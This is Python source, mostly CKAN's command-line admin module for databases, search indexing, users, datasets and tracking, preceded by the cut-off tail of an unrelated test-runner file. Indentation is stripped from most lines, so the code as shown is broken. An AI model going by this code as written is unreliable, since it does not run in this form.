pytest_args = ['-n', 'auto', './run_unittests.py']
pytest_args += convert_args(sys.argv[1:])
return subprocess.run(python_command + ['-m', 'pytest'] + pytest_args).returncode
except ImportError:
print('pytest-xdist not found, using unittest instead')
# All attempts at locating pytest failed, fall back to plain unittest.
cases = ['InternalTests', 'DataTests', 'AllPlatformTests', 'FailureTests',
'PythonTests', 'NativeFileTests', 'RewriterTests', 'CrossFileTests',
'TAPParserTests',
'LinuxlikeTests', 'LinuxCrossArmTests', 'LinuxCrossMingwTests',
'WindowsTests', 'DarwinTests']
return unittest.main(defaultTest=cases, buffer=True)
if __name__ == '__main__':
raise SystemExit(main())
|
cli.py
|
# encoding: utf-8
from __future__ import print_function
import collections
import csv
import multiprocessing as mp
import os
import datetime
import sys
from pprint import pprint
import re
import itertools
import json
import logging
from optparse import OptionConflictError
import traceback
from six import text_type
from six.moves import input, xrange
from six.moves.urllib.error import HTTPError
from six.moves.urllib.parse import urljoin, urlparse
from six.moves.urllib.request import urlopen
import sqlalchemy as sa
import routes
import paste.script
from paste.registry import Registry
from paste.script.util.logging_config import fileConfig
import click
from ckan.config.middleware import make_app
import ckan.logic as logic
import ckan.model as model
import ckan.include.rjsmin as rjsmin
import ckan.include.rcssmin as rcssmin
import ckan.plugins as p
from ckan.common import config
# This is a test Flask request context to be used internally.
# Do not use it!
_cli_test_request_context = None
# NB No CKAN imports are allowed until after the config file is loaded.
# i.e. do the imports in methods, after _load_config is called.
# Otherwise loggers get disabled.
def deprecation_warning(message=None):
'''
Print a deprecation warning to STDERR.
If ``message`` is given it is also printed to STDERR.
'''
sys.stderr.write(u'WARNING: This function is deprecated.')
if message:
sys.stderr.write(u' ' + message.strip())
sys.stderr.write(u'\n')
def error(msg):
'''
    Print an error message to STDERR and exit with return code 1.
'''
sys.stderr.write(msg)
if not msg.endswith('\n'):
sys.stderr.write('\n')
sys.exit(1)
def parse_db_config(config_key='sqlalchemy.url'):
''' Takes a config key for a database connection url and parses it into
a dictionary. Expects a url like:
'postgres://tester:pass@localhost/ckantest3'
'''
from ckan.common import config
url = config[config_key]
    regex = [
        r'^\s*(?P<db_type>\w*)',
        '://',
        '(?P<db_user>[^:]*)',
        ':?',
        '(?P<db_pass>[^@]*)',
        '@',
        '(?P<db_host>[^/:]*)',
        ':?',
        '(?P<db_port>[^/]*)',
        '/',
        r'(?P<db_name>[\w.-]*)'
    ]
db_details_match = re.match(''.join(regex), url)
if not db_details_match:
raise Exception('Could not extract db details from url: %r' % url)
db_details = db_details_match.groupdict()
return db_details
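# Illustrative sketch only (not part of the original module): with the docstring's
# example url 'postgres://tester:pass@localhost/ckantest3', parse_db_config()
# returns {'db_type': 'postgres', 'db_user': 'tester', 'db_pass': 'pass',
#          'db_host': 'localhost', 'db_port': '', 'db_name': 'ckantest3'}.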
def user_add(args):
    '''Add a new user. Used by both "paster sysadmin add"
    and "paster user add".
'''
if len(args) < 1:
error('Error: you need to specify the user name.')
username = args[0]
# parse args into data_dict
data_dict = {'name': username}
for arg in args[1:]:
try:
field, value = arg.split('=', 1)
data_dict[field] = value
except ValueError:
raise ValueError(
                'Could not parse arg: %r (expected "<option>=<value>")' % arg
)
# Required
while '@' not in data_dict.get('email', ''):
data_dict['email'] = input('Email address: ').strip()
if 'password' not in data_dict:
data_dict['password'] = UserCmd.password_prompt()
# Optional
if 'fullname' in data_dict:
data_dict['fullname'] = data_dict['fullname'].decode(
sys.getfilesystemencoding()
)
print('Creating user: %r' % username)
try:
import ckan.logic as logic
import ckan.model as model
site_user = logic.get_action('get_site_user')({
'model': model,
'ignore_auth': True},
{}
)
context = {
'model': model,
'session': model.Session,
'ignore_auth': True,
'user': site_user['name'],
}
user_dict = logic.get_action('user_create')(context, data_dict)
pprint(user_dict)
except logic.ValidationError as e:
error(traceback.format_exc())
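# Illustrative sketch only (not part of the original module): user_add() takes the
# user name followed by optional "field=value" pairs, e.g. a hypothetical call
#   user_add(['bob', 'email=bob@example.org', 'password=Secret123'])
# builds {'name': 'bob', 'email': 'bob@example.org', 'password': 'Secret123'} and
# hands it to the user_create action; a missing email or password is prompted for.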
## from http://code.activestate.com/recipes/577058/ MIT licence.
## Written by Trent Mick
def query_yes_no(question, default="yes"):
"""Ask a yes/no question via input() and return their answer.
"question" is a string that is presented to the user.
"default" is the presumed answer if the user just hits <Enter>.
It must be "yes" (the default), "no" or None (meaning
an answer is required of the user).
The "answer" return value is one of "yes" or "no".
"""
valid = {"yes": "yes", "y": "yes", "ye": "yes",
"no": "no", "n": "no"}
if default is None:
prompt = " [y/n] "
elif default == "yes":
prompt = " [Y/n] "
elif default == "no":
prompt = " [y/N] "
else:
raise ValueError("invalid default answer: '%s'" % default)
while 1:
sys.stdout.write(question + prompt)
choice = input().strip().lower()
if default is not None and choice == '':
return default
elif choice in valid.keys():
return valid[choice]
else:
sys.stdout.write("Please respond with 'yes' or 'no' "
"(or 'y' or 'n').\n")
class MockTranslator(object):
def gettext(self, value):
return value
def ugettext(self, value):
return value
def ungettext(self, singular, plural, n):
if n > 1:
return plural
return singular
def _get_config(config=None):
from paste.deploy import appconfig
if config:
filename = os.path.abspath(config)
config_source = '-c parameter'
elif os.environ.get('CKAN_INI'):
filename = os.environ.get('CKAN_INI')
config_source = '$CKAN_INI'
else:
default_filename = 'development.ini'
filename = os.path.join(os.getcwd(), default_filename)
if not os.path.exists(filename):
# give really clear error message for this common situation
msg = 'ERROR: You need to specify the CKAN config (.ini) '\
'file path.'\
'\nUse the --config parameter or set environment ' \
'variable CKAN_INI or have {}\nin the current directory.' \
.format(default_filename)
exit(msg)
if not os.path.exists(filename):
msg = 'Config file not found: %s' % filename
msg += '\n(Given by: %s)' % config_source
exit(msg)
fileConfig(filename)
return appconfig('config:' + filename)
def load_config(config, load_site_user=True):
conf = _get_config(config)
assert 'ckan' not in dir() # otherwise loggers would be disabled
# We have now loaded the config. Now we can import ckan for the
# first time.
from ckan.config.environment import load_environment
load_environment(conf.global_conf, conf.local_conf)
# Set this internal test request context with the configured environment so
# it can be used when calling url_for from the CLI.
global _cli_test_request_context
app = make_app(conf.global_conf, **conf.local_conf)
flask_app = app.apps['flask_app']._wsgi_app
_cli_test_request_context = flask_app.test_request_context()
registry = Registry()
registry.prepare()
import pylons
registry.register(pylons.translator, MockTranslator())
site_user = None
if model.user_table.exists() and load_site_user:
# If the DB has already been initialized, create and register
# a pylons context object, and add the site user to it, so the
# auth works as in a normal web request
c = pylons.util.AttribSafeContextObj()
registry.register(pylons.c, c)
site_user = logic.get_action('get_site_user')({'ignore_auth': True}, {})
pylons.c.user = site_user['name']
pylons.c.userobj = model.User.get(site_user['name'])
## give routes enough information to run url_for
parsed = urlparse(conf.get('ckan.site_url', 'http://0.0.0.0'))
request_config = routes.request_config()
request_config.host = parsed.netloc + parsed.path
request_config.protocol = parsed.scheme
return site_user
def paster_click_group(summary):
    '''Return a paster command click.Group for paster subcommands
    The paster command name itself is supplied at invocation time and handled
    by PasterClickGroup.__call__ below (it strips the command from sys.argv
    and uses it in the program name shown in help output).
    :param summary: summary text used in paster's help/command listings
        (e.g. "Perform commands to set up the datastore")
'''
class PasterClickGroup(click.Group):
'''A click.Group that may be called like a paster command'''
def __call__(self, ignored_command):
sys.argv.remove(ignored_command)
return super(PasterClickGroup, self).__call__(
prog_name=u'paster ' + ignored_command,
help_option_names=[u'-h', u'--help'],
obj={})
@click.group(cls=PasterClickGroup)
@click.option(
'--plugin',
metavar='ckan',
help='paster plugin (when run outside ckan directory)')
@click_config_option
@click.pass_context
def cli(ctx, plugin, config):
ctx.obj['config'] = config
cli.summary = summary
cli.group_name = u'ckan'
return cli
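# Illustrative sketch only (not part of the original module): a plugin can build
# its paster command group like
#   datastore = paster_click_group('Perform commands to set up the datastore')
# and then attach click subcommands to it with @datastore.command(); the group
# is wired up as a paster command through the plugin's entry points.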
# common definition for paster ... --config
click_config_option = click.option(
'-c',
'--config',
default=None,
metavar='CONFIG',
help=u'Config file to use (default: development.ini)')
class CkanCommand(paste.script.command.Command):
    '''Base class for classes that implement CKAN paster commands.'''
parser = paste.script.command.Command.standard_parser(verbose=True)
parser.add_option('-c', '--config', dest='config',
help='Config file to use.')
parser.add_option('-f', '--file',
action='store',
dest='file_path',
help="File to dump results to (if needed)")
default_verbosity = 1
group_name = 'ckan'
def _load_config(self, load_site_user=True):
self.site_user = load_config(self.options.config, load_site_user)
class ManageDb(CkanCommand):
'''Perform various tasks on the database.
db create - alias of db upgrade
db init - create and put in default data
db clean - clears db (including dropping tables) and
search index
db upgrade [version no.] - Data migrate
db version - returns current version of data schema
db dump FILE_PATH - dump to a pg_dump file [DEPRECATED]
db load FILE_PATH - load a pg_dump from a file [DEPRECATED]
db load-only FILE_PATH - load a pg_dump from a file but don\'t do
the schema upgrade or search indexing [DEPRECATED]
db create-from-model - create database from the model (indexes not made)
    db migrate-filestore - migrate all uploaded data from the 2.1 filestore.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = None
min_args = 1
def command(self):
cmd = self.args[0]
self._load_config(cmd!='upgrade')
import ckan.model as model
import ckan.lib.search as search
if cmd == 'init':
model.repo.init_db()
if self.verbose:
print('Initialising DB: SUCCESS')
elif cmd == 'clean' or cmd == 'drop':
# remove any *.pyc version files to prevent conflicts
v_path = os.path.join(os.path.dirname(__file__),
'..', 'migration', 'versions', '*.pyc')
import glob
filelist = glob.glob(v_path)
for f in filelist:
os.remove(f)
model.repo.clean_db()
search.clear_all()
if self.verbose:
print('Cleaning DB: SUCCESS')
elif cmd == 'upgrade':
if len(self.args) > 1:
model.repo.upgrade_db(self.args[1])
else:
model.repo.upgrade_db()
elif cmd == 'version':
self.version()
elif cmd == 'dump':
self.dump()
elif cmd == 'load':
self.load()
elif cmd == 'load-only':
self.load(only_load=True)
elif cmd == 'create-from-model':
model.repo.create_db()
if self.verbose:
print('Creating DB: SUCCESS')
elif cmd == 'migrate-filestore':
self.migrate_filestore()
else:
error('Command %s not recognized' % cmd)
def _get_db_config(self):
return parse_db_config()
def _get_postgres_cmd(self, command):
self.db_details = self._get_db_config()
if self.db_details.get('db_type') not in ('postgres', 'postgresql'):
raise AssertionError('Expected postgres database - not %r' % self.db_details.get('db_type'))
pg_cmd = command
pg_cmd += ' -U %(db_user)s' % self.db_details
if self.db_details.get('db_pass') not in (None, ''):
pg_cmd = 'export PGPASSWORD=%(db_pass)s && ' % self.db_details + pg_cmd
if self.db_details.get('db_host') not in (None, ''):
pg_cmd += ' -h %(db_host)s' % self.db_details
if self.db_details.get('db_port') not in (None, ''):
pg_cmd += ' -p %(db_port)s' % self.db_details
return pg_cmd
def _get_psql_cmd(self):
psql_cmd = self._get_postgres_cmd('psql')
psql_cmd += ' -d %(db_name)s' % self.db_details
return psql_cmd
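    # Illustrative sketch only (not part of the original module): with the example
    # url from parse_db_config's docstring ('postgres://tester:pass@localhost/ckantest3'),
    # _get_psql_cmd() builds roughly
    #   export PGPASSWORD=pass && psql -U tester -h localhost -d ckantest3
    # (-p is only appended when the url carries an explicit port).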
def _postgres_dump(self, filepath):
pg_dump_cmd = self._get_postgres_cmd('pg_dump')
pg_dump_cmd += ' %(db_name)s' % self.db_details
pg_dump_cmd += ' > %s' % filepath
self._run_cmd(pg_dump_cmd)
print('Dumped database to: %s' % filepath)
def _postgres_load(self, filepath):
import ckan.model as model
assert not model.repo.are_tables_created(), "Tables already found. You need to 'db clean' before a load."
pg_cmd = self._get_psql_cmd() + ' -f %s' % filepath
self._run_cmd(pg_cmd)
print('Loaded CKAN database: %s' % filepath)
def _run_cmd(self, command_line):
import subprocess
retcode = subprocess.call(command_line, shell=True)
if retcode != 0:
raise SystemError('Command exited with errorcode: %i' % retcode)
def dump(self):
deprecation_warning(u"Use PostgreSQL's pg_dump instead.")
if len(self.args) < 2:
print('Need pg_dump filepath')
return
dump_path = self.args[1]
        self._postgres_dump(dump_path)
def load(self, only_load=False):
deprecation_warning(u"Use PostgreSQL's pg_restore instead.")
if len(self.args) < 2:
print('Need pg_dump filepath')
return
dump_path = self.args[1]
        self._postgres_load(dump_path)
if not only_load:
print('Upgrading DB')
import ckan.model as model
model.repo.upgrade_db()
print('Rebuilding search index')
import ckan.lib.search
ckan.lib.search.rebuild()
else:
print('Now remember you have to call \'db upgrade\' and then \'search-index rebuild\'.')
print('Done')
def migrate_filestore(self):
from ckan.model import Session
import requests
from ckan.lib.uploader import ResourceUpload
results = Session.execute("select id, revision_id, url from resource "
"where resource_type = 'file.upload' "
"and (url_type <> 'upload' or url_type is null)"
"and url like '%storage%'")
for id, revision_id, url in results:
response = requests.get(url, stream=True)
if response.status_code != 200:
print("failed to fetch %s (code %s)" % (url,
response.status_code))
continue
resource_upload = ResourceUpload({'id': id})
            assert resource_upload.storage_path, "no storage configured, aborting"
directory = resource_upload.get_directory(id)
filepath = resource_upload.get_path(id)
try:
os.makedirs(directory)
except OSError as e:
## errno 17 is file already exists
if e.errno != 17:
raise
with open(filepath, 'wb+') as out:
for chunk in response.iter_content(1024):
if chunk:
out.write(chunk)
Session.execute("update resource set url_type = 'upload'"
"where id = :id", {'id': id})
Session.execute("update resource_revision set url_type = 'upload'"
"where id = :id and "
"revision_id = :revision_id",
{'id': id, 'revision_id': revision_id})
Session.commit()
print("Saved url %s" % url)
def version(self):
from ckan.model import Session
print(Session.execute('select version from '
'migrate_version;').fetchall())
class SearchIndexCommand(CkanCommand):
'''Creates a search index for all datasets
Usage:
search-index [-i] [-o] [-r] [-e] [-q] rebuild [dataset_name] - reindex dataset_name if given, if not then rebuild
full search index (all datasets)
search-index rebuild_fast - reindex using multiprocessing using all cores.
                                   This acts in the same way as rebuild -r [EXPERIMENTAL]
search-index check - checks for datasets not indexed
search-index show DATASET_NAME - shows index of a dataset
search-index clear [dataset_name] - clears the search index for the provided dataset or
for the whole ckan instance
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 2
min_args = 0
def __init__(self, name):
super(SearchIndexCommand, self).__init__(name)
self.parser.add_option('-i', '--force', dest='force',
action='store_true', default=False,
help='Ignore exceptions when rebuilding the index')
self.parser.add_option('-o', '--only-missing', dest='only_missing',
action='store_true', default=False,
help='Index non indexed datasets only')
self.parser.add_option('-r', '--refresh', dest='refresh',
action='store_true', default=False,
help='Refresh current index (does not clear the existing one)')
self.parser.add_option('-q', '--quiet', dest='quiet',
action='store_true', default=False,
help='Do not output index rebuild progress')
self.parser.add_option('-e', '--commit-each', dest='commit_each',
action='store_true', default=False, help=
'''Perform a commit after indexing each dataset. This ensures that changes are
immediately available in the search results, but significantly slows the process.
Default is false.''')
def command(self):
if not self.args:
# default to printing help
print(self.usage)
return
cmd = self.args[0]
# Do not run load_config yet
if cmd == 'rebuild_fast':
self.rebuild_fast()
return
self._load_config()
if cmd == 'rebuild':
self.rebuild()
elif cmd == 'check':
self.check()
elif cmd == 'show':
self.show()
elif cmd == 'clear':
self.clear()
else:
print('Command %s not recognized' % cmd)
def rebuild(self):
from ckan.lib.search import rebuild, commit
        # By default we don't commit after each request to Solr, as it is
# a really heavy operation and slows things a lot
if len(self.args) > 1:
rebuild(self.args[1])
else:
rebuild(only_missing=self.options.only_missing,
force=self.options.force,
refresh=self.options.refresh,
defer_commit=(not self.options.commit_each),
quiet=self.options.quiet)
if not self.options.commit_each:
commit()
def check(self):
from ckan.lib.search import check
check()
def show(self):
from ckan.lib.search import show
if not len(self.args) == 2:
print('Missing parameter: dataset-name')
return
index = show(self.args[1])
pprint(index)
def clear(self):
from ckan.lib.search import clear, clear_all
package_id = self.args[1] if len(self.args) > 1 else None
if not package_id:
clear_all()
else:
clear(package_id)
def rebuild_fast(self):
        ### Get our config but without starting the pylons environment ####
conf = _get_config(self.options.config)
        ### Get ids using our own engine, otherwise multiprocessing will balk
db_url = conf['sqlalchemy.url']
engine = sa.create_engine(db_url)
package_ids = []
result = engine.execute("select id from package where state = 'active';")
for row in result:
package_ids.append(row[0])
def start(ids):
            ## load the actual environment for each subprocess, so each has its own
## sa session
self._load_config()
from ckan.lib.search import rebuild, commit
rebuild(package_ids=ids)
commit()
def chunks(l, n):
""" Yield n successive chunks from l.
"""
newn = int(len(l) / n)
for i in xrange(0, n-1):
yield l[i*newn:i*newn+newn]
yield l[n*newn-newn:]
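        # Illustrative sketch only (not part of the original module): e.g.
        #   list(chunks([1, 2, 3, 4, 5, 6, 7], 3)) -> [[1, 2], [3, 4], [5, 6, 7]]
        # so the final chunk absorbs any remainder that does not divide evenly.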
processes = []
for chunk in chunks(package_ids, mp.cpu_count()):
process = mp.Process(target=start, args=(chunk,))
processes.append(process)
process.daemon = True
process.start()
for process in processes:
process.join()
class Notification(CkanCommand):
'''Send out modification notifications.
In "replay" mode, an update signal is sent for each dataset in the database.
Usage:
notify replay - send out modification signals
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 0
def command(self):
self._load_config()
from ckan.model import Session, Package, DomainObjectOperation
from ckan.model.modification import DomainObjectModificationExtension
if not self.args:
# default to run
cmd = 'replay'
else:
cmd = self.args[0]
if cmd == 'replay':
dome = DomainObjectModificationExtension()
for package in Session.query(Package):
dome.notify(package, DomainObjectOperation.changed)
else:
print('Command %s not recognized' % cmd)
class RDFExport(CkanCommand):
'''Export active datasets as RDF
This command dumps out all currently active datasets as RDF into the
specified folder.
Usage:
paster rdf-export /path/to/store/output
'''
summary = __doc__.split('\n')[0]
usage = __doc__
def command(self):
self._load_config()
if not self.args:
            # no output folder given; print usage
print(RDFExport.__doc__)
else:
self.export_datasets(self.args[0])
def export_datasets(self, out_folder):
'''
Export datasets as RDF to an output folder.
'''
from ckan.common import config
import ckan.model as model
import ckan.logic as logic
import ckan.lib.helpers as h
# Create output folder if not exists
if not os.path.isdir(out_folder):
os.makedirs(out_folder)
fetch_url = config['ckan.site_url']
user = logic.get_action('get_site_user')({'model': model, 'ignore_auth': True}, {})
context = {'model': model, 'session': model.Session, 'user': user['name']}
dataset_names = logic.get_action('package_list')(context, {})
for dataset_name in dataset_names:
dd = logic.get_action('package_show')(context, {'id': dataset_name})
if not dd['state'] == 'active':
continue
url = h.url_for(controller='package', action='read', id=dd['name'])
url = urljoin(fetch_url, url[1:]) + '.rdf'
try:
fname = os.path.join(out_folder, dd['name']) + ".rdf"
try:
r = urlopen(url).read()
except HTTPError as e:
if e.code == 404:
error('Please install ckanext-dcat and enable the ' +
'`dcat` plugin to use the RDF serializations')
with open(fname, 'wb') as f:
f.write(r)
except IOError as ioe:
sys.stderr.write(str(ioe) + "\n")
class Sysadmin(CkanCommand):
'''Gives sysadmin rights to a named user
Usage:
sysadmin - lists sysadmins
sysadmin list - lists sysadmins
sysadmin add USERNAME - make an existing user into a sysadmin
sysadmin add USERNAME [FIELD1=VALUE1 FIELD2=VALUE2 ...]
- creates a new user that is a sysadmin
(prompts for password and email if not
supplied).
Field can be: apikey
password
email
sysadmin remove USERNAME - removes user from sysadmins
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = None
min_args = 0
def command(self):
self._load_config()
cmd = self.args[0] if self.args else None
if cmd is None or cmd == 'list':
self.list()
elif cmd == 'add':
self.add()
elif cmd == 'remove':
self.remove()
else:
print('Command %s not recognized' % cmd)
def list(self):
import ckan.model as model
print('Sysadmins:')
sysadmins = model.Session.query(model.User).filter_by(sysadmin=True,
state='active')
print('count = %i' % sysadmins.count())
for sysadmin in sysadmins:
print('%s name=%s email=%s id=%s' % (
sysadmin.__class__.__name__,
sysadmin.name,
sysadmin.email,
sysadmin.id))
def add(self):
import ckan.model as model
if len(self.args) < 2:
print('Need name of the user to be made sysadmin.')
return
username = self.args[1]
user = model.User.by_name(text_type(username))
if not user:
print('User "%s" not found' % username)
makeuser = input('Create new user: %s? [y/n]' % username)
if makeuser == 'y':
user_add(self.args[1:])
user = model.User.by_name(text_type(username))
else:
print('Exiting ...')
return
user.sysadmin = True
model.Session.add(user)
model.repo.commit_and_remove()
print('Added %s as sysadmin' % username)
def remove(self):
import ckan.model as model
if len(self.args) < 2:
print('Need name of the user to be removed from the sysadmins.')
return
username = self.args[1]
user = model.User.by_name(text_type(username))
if not user:
print('Error: user "%s" not found!' % username)
return
user.sysadmin = False
model.repo.commit_and_remove()
class UserCmd(CkanCommand):
'''Manage users
Usage:
user - lists users
user list - lists users
user USERNAME - shows user properties
user add USERNAME [FIELD1=VALUE1 FIELD2=VALUE2 ...]
- add a user (prompts for email and
password if not supplied).
Field can be: apikey
password
email
user setpass USERNAME - set user password (prompts)
user remove USERNAME - removes user from users
user search QUERY - searches for a user name
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = None
min_args = 0
def command(self):
self._load_config()
if not self.args:
self.list()
else:
cmd = self.args[0]
if cmd == 'add':
self.add()
elif cmd == 'remove':
self.remove()
elif cmd == 'search':
self.search()
elif cmd == 'setpass':
self.setpass()
elif cmd == 'list':
self.list()
else:
self.show()
def get_user_str(self, user):
user_str = 'name=%s' % user.name
if user.name != user.display_name:
user_str += ' display=%s' % user.display_name
return user_str
def list(self):
import ckan.model as model
print('Users:')
users = model.Session.query(model.User).filter_by(state='active')
print('count = %i' % users.count())
for user in users:
print(self.get_user_str(user))
def show(self):
import ckan.model as model
username = self.args[0]
user = model.User.get(text_type(username))
print('User: \n', user)
def setpass(self):
import ckan.model as model
if len(self.args) < 2:
print('Need name of the user.')
return
username = self.args[1]
user = model.User.get(username)
print('Editing user: %r' % user.name)
password = self.password_prompt()
user.password = password
model.repo.commit_and_remove()
print('Done')
def search(self):
import ckan.model as model
if len(self.args) < 2:
print('Need user name query string.')
return
query_str = self.args[1]
query = model.User.search(query_str)
print('%i users matching %r:' % (query.count(), query_str))
for user in query.all():
print(self.get_user_str(user))
@classmethod
def password_prompt(cls):
import getpass
password1 = None
while not password1:
password1 = getpass.getpass('Password: ')
password2 = getpass.getpass('Confirm password: ')
if password1 != password2:
error('Passwords do not match')
return password1
def add(self):
user_add(self.args[1:])
def remove(self):
import ckan.model as model
if len(self.args) < 2:
print('Need name of the user.')
return
username = self.args[1]
p.toolkit.get_action('user_delete')(
{'model': model, 'ignore_auth': True},
{'id': username})
print('Deleted user: %s' % username)
class DatasetCmd(CkanCommand):
'''Manage datasets
Usage:
dataset DATASET_NAME|ID - shows dataset properties
dataset show DATASET_NAME|ID - shows dataset properties
dataset list - lists datasets
dataset delete [DATASET_NAME|ID] - changes dataset state to 'deleted'
dataset purge [DATASET_NAME|ID] - removes dataset from db entirely
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 3
min_args = 0
def command(self):
self._load_config()
if not self.args:
print(self.usage)
else:
cmd = self.args[0]
if cmd == 'delete':
self.delete(self.args[1])
elif cmd == 'purge':
self.purge(self.args[1])
elif cmd == 'list':
self.list()
elif cmd == 'show':
self.show(self.args[1])
else:
self.show(self.args[0])
def list(self):
import ckan.model as model
print('Datasets:')
datasets = model.Session.query(model.Package)
print('count = %i' % datasets.count())
for dataset in datasets:
state = ('(%s)' % dataset.state) if dataset.state != 'active' else ''
print('%s %s %s' % (dataset.id, dataset.name, state))
def _get_dataset(self, dataset_ref):
import ckan.model as model
dataset = model.Package.get(text_type(dataset_ref))
assert dataset, 'Could not find dataset matching reference: %r' % dataset_ref
return dataset
def show(self, dataset_ref):
import pprint
dataset = self._get_dataset(dataset_ref)
pprint.pprint(dataset.as_dict())
def delete(self, dataset_ref):
import ckan.model as model
dataset = self._get_dataset(dataset_ref)
old_state = dataset.state
rev = model.repo.new_revision()
dataset.delete()
model.repo.commit_and_remove()
dataset = self._get_dataset(dataset_ref)
print('%s %s -> %s' % (dataset.name, old_state, dataset.state))
def purge(self, dataset_ref):
import ckan.logic as logic
dataset = self._get_dataset(dataset_ref)
name = dataset.name
site_user = logic.get_action('get_site_user')({'ignore_auth': True}, {})
context = {'user': site_user['name']}
logic.get_action('dataset_purge')(
context, {'id': dataset_ref})
print('%s purged' % name)
class Ratings(CkanCommand):
'''Manage the ratings stored in the db
Usage:
ratings count - counts ratings
ratings clean - remove all ratings
ratings clean-anonymous - remove only anonymous ratings
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 1
def command(self):
self._load_config()
import ckan.model as model
cmd = self.args[0]
if cmd == 'count':
self.count()
elif cmd == 'clean':
self.clean()
elif cmd == 'clean-anonymous':
self.clean(user_ratings=False)
else:
print('Command %s not recognized' % cmd)
def count(self):
import ckan.model as model
q = model.Session.query(model.Rating)
print("%i ratings" % q.count())
# SQLAlchemy needs `.is_(None)`; the Python `is` operator would always be False here
q = q.filter(model.Rating.user_id.is_(None))
print("of which %i are anonymous ratings" % q.count())
def clean(self, user_ratings=True):
import ckan.model as model
q = model.Session.query(model.Rating)
print("%i ratings" % q.count())
if not user_ratings:
q = q.filter(model.Rating.user_id.is_(None))
print("of which %i are anonymous ratings" % q.count())
ratings = q.all()
for rating in ratings:
rating.purge()
model.repo.commit_and_remove()
## Used by the Tracking class
_ViewCount = collections.namedtuple("ViewCount", "id name count")
class Tracking(CkanCommand):
'''Update tracking statistics
Usage:
tracking update [start_date] - update tracking stats
tracking export FILE [start_date] - export tracking stats to a csv file
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 3
min_args = 1
def command(self):
self._load_config()
import ckan.model as model
engine = model.meta.engine
cmd = self.args[0]
if cmd == 'update':
start_date = self.args[1] if len(self.args) > 1 else None
self.update_all(engine, start_date)
elif cmd == 'export':
if len(self.args) <= 1:
error(self.__class__.__doc__)
output_file = self.args[1]
start_date = self.args[2] if len(self.args) > 2 else None
self.update_all(engine, start_date)
self.export_tracking(engine, output_file)
else:
error(self.__class__.__doc__)
def update_all(self, engine, start_date=None):
if start_date:
start_date = datetime.datetime.strptime(start_date, '%Y-%m-%d')
else:
# No date given. See when we last have data for and get data
# from 2 days before then in case new data is available.
# If no date here then use 2011-01-01 as the start date
sql = '''SELECT tracking_date from tracking_summary
ORDER BY tracking_date DESC LIMIT 1;'''
result = engine.execute(sql).fetchall()
if result:
start_date = result[0]['tracking_date']
start_date += datetime.timedelta(-2)
# convert date to datetime
combine = datetime.datetime.combine
start_date = combine(start_date, datetime.time(0))
else:
start_date = datetime.datetime(2011, 1, 1)
start_date_solrsync = start_date
end_date = datetime.datetime.now()
while start_date < end_date:
stop_date = start_date + datetime.timedelta(1)
self.update_tracking(engine, start_date)
print('tracking updated for %s' % start_date)
start_date = stop_date
self.update_tracking_solr(engine, start_date_solrsync)
def _total_views(self, engine):
sql = '''
SELECT p.id,
p.name,
COALESCE(SUM(s.count), 0) AS total_views
FROM package AS p
LEFT OUTER JOIN tracking_summary AS s ON s.package_id = p.id
GROUP BY p.id, p.name
ORDER BY total_views DESC
'''
return [_ViewCount(*t) for t in engine.execute(sql).fetchall()]
def _recent_views(self, engine, measure_from):
sql = '''
SELECT p.id,
p.name,
COALESCE(SUM(s.count), 0) AS total_views
FROM package AS p
LEFT OUTER JOIN tracking_summary AS s ON s.package_id = p.id
WHERE s.tracking_date >= %(measure_from)s
GROUP BY p.id, p.name
ORDER BY total_views DESC
'''
return [_ViewCount(*t) for t in engine.execute(sql, measure_from=str(measure_from)).fetchall()]
def export_tracking(self, engine, output_filename):
'''Write tracking summary to a csv file.'''
HEADINGS = [
"dataset id",
"dataset name",
"total views",
"recent views (last 2 weeks)",
]
measure_from = datetime.date.today() - datetime.timedelta(days=14)
recent_views = self._recent_views(engine, measure_from)
total_views = self._total_views(engine)
with open(output_filename, 'w') as fh:
f_out = csv.writer(fh)
f_out.writerow(HEADINGS)
recent_views_for_id = dict((r.id, r.count) for r in recent_views)
f_out.writerows([(r.id,
r.name,
r.count,
recent_views_for_id.get(r.id, 0))
for r in total_views])
def update_tracking(self, engine, summary_date):
PACKAGE_URL = '/dataset/'
# clear out existing data before adding new
sql = '''DELETE FROM tracking_summary
WHERE tracking_date='%s'; ''' % summary_date
engine.execute(sql)
sql = '''SELECT DISTINCT url, user_key,
CAST(access_timestamp AS Date) AS tracking_date,
tracking_type INTO tracking_tmp
FROM tracking_raw
WHERE CAST(access_timestamp as Date)=%s;
INSERT INTO tracking_summary
(url, count, tracking_date, tracking_type)
SELECT url, count(user_key), tracking_date, tracking_type
FROM tracking_tmp
GROUP BY url, tracking_date, tracking_type;
DROP TABLE tracking_tmp;
COMMIT;'''
engine.execute(sql, summary_date)
# get ids for dataset urls
sql = '''UPDATE tracking_summary t
SET package_id = COALESCE(
(SELECT id FROM package p
WHERE p.name = regexp_replace(' ' || t.url, '^[ ]{1}(/\w{2}){0,1}' || %s, ''))
,'~~not~found~~')
WHERE t.package_id IS NULL
AND tracking_type = 'page';'''
engine.execute(sql, PACKAGE_URL)
# update summary totals for resources
sql = '''UPDATE tracking_summary t1
SET running_total = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.url = t2.url
AND t2.tracking_date <= t1.tracking_date
)
,recent_views = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.url = t2.url
AND t2.tracking_date <= t1.tracking_date AND t2.tracking_date >= t1.tracking_date - 14
)
WHERE t1.running_total = 0 AND tracking_type = 'resource';'''
engine.execute(sql)
# update summary totals for pages
sql = '''UPDATE tracking_summary t1
SET running_total = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.package_id = t2.package_id
AND t2.tracking_date <= t1.tracking_date
)
,recent_views = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.package_id = t2.package_id
AND t2.tracking_date <= t1.tracking_date AND t2.tracking_date >= t1.tracking_date - 14
)
WHERE t1.running_total = 0 AND tracking_type = 'page'
AND t1.package_id IS NOT NULL
AND t1.package_id != '~~not~found~~';'''
engine.execute(sql)
def update_tracking_solr(self, engine, start_date):
sql = '''SELECT package_id FROM tracking_summary
where package_id!='~~not~found~~'
and tracking_date >= %s;'''
